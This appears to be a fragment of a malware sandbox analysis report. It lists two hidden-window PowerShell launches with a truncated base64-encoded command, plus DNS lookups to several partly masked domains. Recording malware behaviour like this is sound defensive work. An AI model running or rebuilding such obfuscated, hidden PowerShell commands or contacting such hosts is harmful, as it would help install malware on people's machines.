Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAGUAcgByAHEAbAB4AHoAYgA9ACcAUgBnAGcAZwB5AHcAYwB5AGsAJwA7ACQASgBrAGIAbABuAGsAYQB2AHMAIAA9ACAAJwA0AD...
- DNS ASK sl###lief.org
- DNS ASK tu####spuestas.com
- DNS ASK st####-ogham.com
- DNS ASK me####paradies.com
- DNS ASK me##eko.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAGUAcgByAHEAbAB4AHoAYgA9ACcAUgBnAGcAZwB5AHcAYwB5AGsAJwA7ACQASgBrAGIAbABuAGsAYQB2AHMAIAA9ACAAJwA0AD...' (with hidden window)